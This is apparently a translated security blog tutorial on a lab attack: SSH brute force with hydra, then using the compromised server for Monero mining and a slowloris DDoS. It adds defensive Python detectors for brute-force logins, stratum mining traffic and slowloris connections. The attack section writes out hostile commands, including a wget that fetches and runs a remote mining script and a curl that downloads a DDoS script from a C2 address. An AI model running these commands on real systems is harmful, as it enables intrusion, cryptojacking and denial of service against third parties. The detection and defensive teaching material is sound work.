Author: cherishao (leader of the emergency response team of Xin'an Road)
In the blink of an eye the first half of 2018 is already over. The most common security incident of that period was a server or office host being remotely controlled as a bot ("chicken") and used either to mine cryptocurrency for profit or to launch DDoS attacks against other websites. This article shows how an attacker breaks into a Linux server through a conventional SSH weak password and then uses that server both for mining and for a DDoS attack on another site. The attack and analysis process is fairly simple; corrections are welcome.
Experimental environment
The Linux server, the site source code and the domain name used are as follows:
Linux: Kali 2.0
IP:192.168.95.132
Website deployment source code: discuzx.7z
Deployment tool: phpstudy
Website Domain: Cherishao.com
The tools used are as follows:
SSH blasting: hydra-8.1-windows
Remote terminal management: X term
Analysis tool: Wireshark
Website building
Download the Discuz! X source code and use phpstudy to set up the site quickly: put the source code in its www directory and start it (see the readme.md document).
Domain name binding
Bind the server IP address to the registered domain name by adding a DNS resolution record:
Attack process
Use security tools to attack the designated target server (which provides common network services such as web and terminal services). The attack process is designed as follows:
SSH blasting
Scanning the server of the target site (IP address 192.168.95.132) shows that port 22 (SSH) is open and that the operating system is Linux.
Use Hydra to brute force SSH and obtain access to the server (dictionary.txt is the password list):
hydra -l root -P dictionary.txt -V ssh://192.168.95.132
Log in to the server with the credentials obtained by brute force (root / 123456):
After connecting to the server, run a script that fetches the remote mining program. Current state of the server:
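A brute force run like the one above leaves a very recognisable trail in the victim's sshd log: a burst of "Failed password" lines from one source, followed by an "Accepted password" from the same source once the dictionary hits. The following detector is an added example written for this article, not code from the original post or from Hydra; the auth.log lines it parses are constructed to match what such a run would produce, and the threshold of five failures is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/auth.log lines (not a real capture): a dictionary attack
# against root from 192.168.95.1 that ends in a successful login, plus one unrelated failure.
SAMPLE_AUTH_LOG = """\
Jun 30 10:15:01 kali sshd[2311]: Failed password for root from 192.168.95.1 port 50211 ssh2
Jun 30 10:15:01 kali sshd[2312]: Failed password for root from 192.168.95.1 port 50212 ssh2
Jun 30 10:15:02 kali sshd[2313]: Failed password for root from 192.168.95.1 port 50213 ssh2
Jun 30 10:15:02 kali sshd[2314]: Failed password for root from 192.168.95.1 port 50214 ssh2
Jun 30 10:15:03 kali sshd[2315]: Failed password for root from 192.168.95.1 port 50215 ssh2
Jun 30 10:15:03 kali sshd[2316]: Failed password for invalid user admin from 10.0.0.7 port 41000 ssh2
Jun 30 10:15:04 kali sshd[2317]: Accepted password for root from 192.168.95.1 port 50216 ssh2
"""

# sshd prefixes non-existent accounts with "invalid user"; the optional group absorbs that.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")


def analyze_auth_log(text, threshold=5):
    """Count failed logins per source IP and flag successful logins from brute-forcing sources.

    threshold is an assumed tuning value: a real attacker run (hydra defaults to 16 parallel
    tasks) produces far more than five failures per second.
    """
    failures = defaultdict(int)
    accepted = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group("ip")] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted.append((m.group("ip"), m.group("user")))
    brute_sources = {ip for ip, n in failures.items() if n >= threshold}
    # The case that matters most: the brute force succeeded and the host is now compromised.
    compromised = [(ip, user) for ip, user in accepted if ip in brute_sources]
    return {
        "failures": dict(failures),
        "brute_sources": brute_sources,
        "compromised": compromised,
    }


if __name__ == "__main__":
    report = analyze_auth_log(SAMPLE_AUTH_LOG)
    for ip, n in report["failures"].items():
        print(f"{ip}: {n} failed logins")
    for ip, user in report["compromised"]:
        print(f"ALERT: {user} logged in from brute-forcing source {ip}")
```

The same logic is what tools such as fail2ban apply in real time; the difference here is the explicit "success after failures" check, which is the signal that a password guess actually worked rather than just noise from the Internet.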
Mining with server
Get installation script
wget --no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_2_5.sh -O mservice.sh
Execute script to start mining
sudo bash mservice.sh 10014   # this ID can be replaced with your own user ID
CPU status of server mining (CPU soared to 96%):
DDoS attack
Use the compromised server to launch a DDoS attack against the site cherishao.com.
Fetch the DDoS script from the C2 server:
curl -O http://173.82.235.146/slowloris.pl
Launch the DDoS attack on the site:
perl slowloris.pl -dns cherishao.com -timeout 1 -num 1000
Site access status before the attack:
Website status after the DDoS attack:
Analysis of communication characteristic flow
Packet capture analysis with Wireshark
Mining data flow analysis
The miner talks to the pool using the stratum protocol as cleartext JSON-RPC, so following the TCP stream in Wireshark exposes the login message. From that communication data flow we can identify the wallet address used by the miner:
42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik
and the agent string sent in the same login:
"XMRig/2.5.2"
This agent string is a characteristic of the XMRig miner and can be used as a traffic signature.
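The wallet and agent above are extracted from the stratum "login" message, and the rest of the mining session (the setup started with mservice.sh and the traffic analysed here) consists of "job" messages from the pool and "submit" messages from the miner. The parser below is an added example written for this article, not code from the original post or from XMRig; it takes a reassembled TCP stream of newline-delimited JSON-RPC and returns the indicators an analyst would pull out. The stream it parses is constructed: the wallet address and agent string are the ones from the capture above, while the job blobs, targets, nonces and session id are made-up values, and the miner agent list is an assumed signature set.

```python
import json
import re

# Wallet address and agent string observed in the capture above.
WALLET = "42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik"
AGENT = "XMRig/2.5.2"

# A standard Monero address is 95 base58 characters beginning with '4'
# (base58 omits 0, O, I and l).
XMR_ADDR_RE = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
# Assumed signature list of common miner agent strings.
MINER_AGENT_RE = re.compile(r"XMRig|xmr-stak|cpuminer|ccminer", re.IGNORECASE)

# Constructed stratum session (not a real capture): login, pool reply, a new job,
# two share submissions and one pool acknowledgement. Blobs, targets, nonces and
# the session id are made-up values.
SAMPLE_STREAM = "\n".join([
    '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"%s","pass":"x","agent":"%s"}}' % (WALLET, AGENT),
    '{"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"a1b2c3","job":{"blob":"0707deadbeef","job_id":"j1","target":"b88d0600"},"status":"OK"}}',
    '{"jsonrpc":"2.0","method":"job","params":{"blob":"0707cafebabe","job_id":"j2","target":"b88d0600"}}',
    '{"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"a1b2c3","job_id":"j2","nonce":"1a2b3c4d","result":"00ab"}}',
    '{"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}',
    '{"id":3,"jsonrpc":"2.0","method":"submit","params":{"id":"a1b2c3","job_id":"j2","nonce":"9f8e7d6c","result":"00cd"}}',
])


def analyze_stratum_stream(payload):
    """Parse newline-delimited JSON-RPC from a TCP stream and return mining indicators."""
    ind = {"wallet": None, "agent": None, "methods": [],
           "valid_monero_address": False, "shares_submitted": 0}
    for raw in payload.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            msg = json.loads(raw)
        except json.JSONDecodeError:
            continue  # not stratum (or a partial line); skip it
        method = msg.get("method")
        if method:
            ind["methods"].append(method)
        params = msg.get("params") or {}
        if method == "login":
            # Pools commonly accept "wallet.worker" or "wallet+difficulty"; keep only the wallet part.
            login = params.get("login") or ""
            ind["wallet"] = login.split(".")[0].split("+")[0]
            ind["agent"] = params.get("agent")
            ind["valid_monero_address"] = bool(XMR_ADDR_RE.match(ind["wallet"]))
        elif method == "submit":
            ind["shares_submitted"] += 1
    ind["is_mining"] = "login" in ind["methods"] and (
        ind["valid_monero_address"] or bool(MINER_AGENT_RE.search(ind["agent"] or "")))
    return ind


if __name__ == "__main__":
    for key, value in analyze_stratum_stream(SAMPLE_STREAM).items():
        print(f"{key}: {value}")
```

Two caveats when using this on real traffic: a miner configured for stratum over TLS will show none of this in a capture, and the wallet address is the pivot that lets you connect separate infected hosts to the same operator, so it is worth keeping alongside the pool IP and port.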
DDoS data flow analysis
Slowloris works by opening many connections to the web server and keeping each one alive with a never-finished HTTP request header, so the server's connection slots fill up. In the capture, a large number of DNS request packets for cherishao.com also appear, since the script resolves the target by hostname for the connections it opens:
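On the victim side, the slowloris signature is not volume but incomplete requests held open for a long time by a single source. The checker below is an added example written for this article, not code from the original post or from the slowloris.pl script; it classifies a snapshot of connection states and flags sources holding many stale half-requests. The connection records are constructed: the partial request mimics the shape slowloris sends (a request line and headers without the terminating blank line, padded with "X-a: b" lines), and the age and per-source thresholds are assumed tuning values.

```python
SLOW_AGE_S = 30       # assumed: a header still incomplete after this long is suspicious
PER_IP_LIMIT = 20     # assumed: this many slow connections from one source is a slowloris pattern

# Constructed samples (not a real capture). A complete HTTP/1.1 request header ends with
# an empty line; slowloris never sends it and keeps the connection alive with junk headers.
PARTIAL = (b"GET /?1234 HTTP/1.1\r\nHost: cherishao.com\r\n"
           b"User-Agent: Mozilla/4.0\r\nContent-Length: 42\r\n" + b"X-a: b\r\n" * 3)
COMPLETE = b"GET / HTTP/1.1\r\nHost: cherishao.com\r\n\r\n"


def header_complete(buf):
    """True once the request header has been fully received."""
    return b"\r\n\r\n" in buf


def classify_connections(conns, now, slow_age=SLOW_AGE_S, per_ip_limit=PER_IP_LIMIT):
    """conns: list of {"src": ip, "opened_at": seconds, "buf": bytes received so far}.

    Returns (slow_per_ip, offenders): how many stale incomplete requests each source holds,
    and the sorted list of sources over the per-source limit.
    """
    slow = {}
    for c in conns:
        if header_complete(c["buf"]):
            continue  # a normal request; nothing to do
        if now - c["opened_at"] >= slow_age:
            slow[c["src"]] = slow.get(c["src"], 0) + 1
    offenders = sorted(ip for ip, n in slow.items() if n >= per_ip_limit)
    return slow, offenders


def sample_connections(now):
    """Constructed snapshot: 25 stale half-requests from the compromised server,
    one normal request, and one fresh connection that has simply not finished yet."""
    conns = [{"src": "192.168.95.132", "opened_at": now - 120, "buf": PARTIAL} for _ in range(25)]
    conns.append({"src": "10.0.0.5", "opened_at": now - 1, "buf": COMPLETE})
    conns.append({"src": "10.0.0.6", "opened_at": now - 2, "buf": PARTIAL[:20]})
    return conns


if __name__ == "__main__":
    now = 1000.0
    slow, offenders = classify_connections(sample_connections(now), now)
    print("stale incomplete requests per source:", slow)
    print("slowloris candidates:", offenders)
```

The fresh connection from 10.0.0.6 is deliberately not flagged: a slow client on a bad link looks identical for the first few seconds, which is why the age threshold matters. The corresponding server-side fix is to bound how long a header may take to arrive, for example Apache's mod_reqtimeout (RequestReadTimeout header=20-40,MinRate=500), rather than to block on request count alone.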
Summary and related attachments
summary
In recent years many new ways of breaking into systems have appeared, such as exploitation of Apache Struts2 vulnerabilities and the Hadoop YARN REST API unauthorized-access vulnerability. The old SSH brute force attack, however, is far from dead and is in fact getting fiercer.
Through this simple setup the article mainly wants to convey two points. First, once an attacker has obtained control of our system, he can do many things that harm us, such as stealing information, destroying data and attacking others. Second, in daily work and life, pay more attention to password policy and strengthen your own security awareness.
Related attachments
Https://pan.baidu.com/s/1zkrmambnuhve6mw7ccqcnq password: mp3l
Reference link
SSH brute force cracking trend
http://www.freebuf.com/articles/paper/177473.html